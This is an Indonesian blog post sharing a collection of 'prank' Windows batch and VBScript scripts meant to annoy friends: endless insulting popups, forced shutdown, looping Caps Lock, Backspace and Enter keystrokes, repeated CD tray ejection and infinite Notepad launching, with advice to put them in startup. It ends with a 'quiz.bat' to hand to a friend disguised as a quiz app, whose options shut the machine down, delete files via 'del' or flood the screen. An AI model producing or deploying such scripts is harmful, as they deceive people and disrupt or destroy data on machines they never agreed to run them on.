Kumpulan Script iseng,.. ( Dijamin Ngeselin Abisss,.. )

Dah lama nih kawan ane gak posting lagi karna lagi sibuk…hehe.. kali ini saya mau posting cara jailin orang dengan script script sederhana
dan ada yang berguna juga tergantung gimana temen2 modif kata2 nya
bisa di kombinasiin sendiri ….misal nya di taruh di startup..

buka notepad lalu copy paste script di bawah…..

1.message yang nongol melulu

Code:

@ECHO off
:Begin
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN

save namafile.BAT
ket:
walaupun di kill task manager,masih tetep nongol message nya

kata2 nya bisa diganti sesuai selera masing2…

2.bikin shutdown+message

Code:

@echo off
msg * apaan sih lo
shutdown -s -c “Error! muka mu standar abis”

save namafile.BAT

3.Mainin Caps Lock button

Code:

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop

save namafile.vbs

4.buka tutup CD/DVD
Code:

Set oWMP = CreateObject(“WMPlayer.OCX.7”)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

save namafile.vbs

5.bikin vbscript nongol mlulu
Code:

Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop

save namafile.vbs
ket: di task manager full wscript yg lg running

6.teken tombol backspace mlulu
Code:

MsgBox “kembali ke menu sebelumnya”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop

save namafile.vbs

7.otomatis ngetik “lu jelek banget sih” di notepad/word
Code:

Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “lu jelek banget sih!!!”
loop

save namafile.vbs

8.buka notepad trus menerus
Code:

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

save namafile.BAT
ket : termasuk yang ngeselin banget nih
bisa di ganti,terserah mau buka cmd ato buka yg lain..ganti aja dir nya.

9.otomatis buka notepad lalu ngetik apa yg lo mau
Code:

WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 10
WshShell.AppActivate “Notepad”
WScript.Sleep 50
WshShell.SendKeys “ka”
WScript.Sleep 50
WshShell.SendKeys “mu “
WScript.Sleep 50
WshShell.SendKeys “je”
WScript.Sleep 50
WshShell.SendKeys “le”
WScript.Sleep 50
WshShell.SendKeys “k “
WScript.Sleep 50
WshShell.SendKeys ” se”
WScript.Sleep 50
WshShell.SendKeys “ka”
WScript.Sleep 50
WshShell.SendKeys “li”
WScript.Sleep 50
WshShell.SendKeys ” y”
WScript.Sleep 50
WshShell.SendKeys “a”
WScript.Sleep 50
WshShell.SendKeys ” h”
WScript.Sleep 50
WshShell.SendKeys “!”
WScript.Sleep 50
WshShell.SendKeys “!! “

save namafile.vbs

ket:
ini salah satu script favorit gw…dulu pernah gw nembak cewek pake cara ini..
gw rangkai pake kata2 gw…trus durasi ngetik nya juga di lambatin…
nama file nya isihatiku.vbs..
angka2 di atas bisa di modif sendiri (durasi nongol notepad/ngetiknya)

Tambahan ahh
dari script diatas temen2 kembangin aja lagi…misal kayak gini nih
Code:

@echo off
title quiz hari ini🙂
:menu
cls
echo jika kamu kena virus apa yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t 30
if %input%==2 del c:\xxx
if %input%==3 @ECHO off
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

nah script diatas save jadi quiz.bat kasih ke temen..
pura2 aj bilang ad aplikasi kuis…
ket di atas :
kalo pilih 1.otomatis matiin computer
2.format file (terserah file apaan ganti aj dir nya)
3.sama aj kayak pilihan 1
kata2 di atas di ganti2 aj sesuai selera temen2

sekian kumpulan script2 yang jail/berguna, Selamat beriseng ria,…………….

Created By….
viets jeremy

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s